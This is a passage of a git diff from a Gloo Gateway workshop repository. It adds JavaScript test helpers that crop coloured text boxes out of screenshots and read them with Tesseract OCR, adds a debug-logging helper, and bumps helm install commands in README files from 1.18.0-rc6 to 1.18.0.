neighbor.y); + maxY = Math.max(maxY, neighbor.y); + } + } + } + } + } + + const padding = -1; + const removePointingCaret = 6; + boundingBoxes.push({ + left: Math.max(0, Math.min(minX - padding, width - 1)), + top: Math.max(0, Math.min(minY - padding, height - 1)), + width: Math.max( + 1, + Math.min(maxX - minX + 2 * padding, width - Math.max(0, minX - padding)) + ), + height: Math.max( + 1, + Math.min(maxY - minY + 2 * padding, height - Math.max(0, minY - padding)) + ) - removePointingCaret, + }); + } + } + } + + return boundingBoxes; +} + +// Function to extract boxes from image +async function extractTextBoxes(inputImagePath, targetColor) { + const image = sharp(inputImagePath); + const metadata = await image.metadata(); + const { width, height, channels } = metadata; + + if (channels !== 3 && channels !== 4) { + throw new Error(`Unsupported number of channels: ${channels}. Only RGB and RGBA are supported.`); + } + + const { data } = await image.raw().toBuffer({ resolveWithObject: true }); + const boundingBoxes = await getTextBoxBoundingBoxes(data, width, height, channels, targetColor); + debugLog(`Found ${boundingBoxes.length} text box(es).`); + + if (!fs.existsSync(OUTPUT_DIR)) { + fs.mkdirSync(OUTPUT_DIR); + } + + const extractedImages = []; + for (let i = 0; i < boundingBoxes.length; i++) { + const image = sharp(inputImagePath); + let box = boundingBoxes[i]; + + // Skip small boxes, those are artifacts, or rediscoveries of the characters in the same box. + if (box.width < 50 && box.height < 30) { + continue; + } + + const outputPath = path.join(OUTPUT_DIR, `text_box_${i + 1}.png`); + await image.extract(box).ensureAlpha().png().toFile(outputPath); + extractedImages.push(outputPath); + } + + return extractedImages; +} + +// Extract boxes with `targetColor` and perform OCR on those. +/** + * Recognizes text from a screenshot image. + * + * @param {string} imagePath - The path to the screenshot image. 
+ * @param {string[]} expectedWords - An array of expected words to recognize. + * @param {object} targetColor - The target color used to extract text boxes. Defaults to { r: 53, g: 57, b: 59 }, which represents the service labels in the Observability graph. + * @returns {Promise<string[]>} - A promise that resolves to an array of recognized texts. + */ +async function recognizeTextFromScreenshot(imagePath, expectedWords = [], targetColor = { r: 53, g: 57, b: 59 }) { + const whitelist = expectedWords.join('').replace(/\s+/g, ''); + const extractedImages = await extractTextBoxes(imagePath, targetColor); + + const recognizedTexts = []; + for (const image of extractedImages) { + const text = await Tesseract.recognize(image, 'eng', { + tessedit_pageseg_mode: 11, + tessedit_ocr_engine_mode: 1, + tessedit_char_whitelist: whitelist, + }).then(({ data: { text } }) => text); + recognizedTexts.push(text); + } + + return recognizedTexts; +} + +module.exports = { + recognizeTextFromScreenshot, +}; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils/logging.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/logging.js new file mode 100644 index 0000000000..e8cf677cff --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/logging.js @@ -0,0 +1,9 @@ +const debugMode = process.env.RUNNER_DEBUG === '1' || process.env.DEBUG_MODE === 'true'; + +function debugLog(...args) { + if (debugMode && args.length > 0) { + console.log(...args); + } +} + +module.exports = { debugLog }; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise/ai-gateway/README.md b/gloo-gateway/1-18/enterprise/ai-gateway/README.md index b1edb5be12..5c66d62228 100644 --- a/gloo-gateway/1-18/enterprise/ai-gateway/README.md +++ b/gloo-gateway/1-18/enterprise/ai-gateway/README.md @@ -142,7 +142,7 @@ helm repo update helm upgrade -i -n gloo-system \ gloo-gateway gloo-ee-helm/gloo-ee \ --create-namespace \ - --version 1.18.0-rc6 \ + --version 1.18.0 \ --kube-context $CLUSTER1 \ 
--set-string license_key=$LICENSE_KEY \ -f -< -#
Gloo Gateway Workshop
+#
Gloo Gateway as a Waypoint
@@ -854,7 +854,7 @@ helm repo update helm upgrade -i -n gloo-system \ gloo-gateway gloo-ee-helm/gloo-ee \ --create-namespace \ - --version 1.18.0-rc6 \ + --version 1.18.0 \ --kube-context $CLUSTER1 \ --set-string license_key=$LICENSE_KEY \ -f -<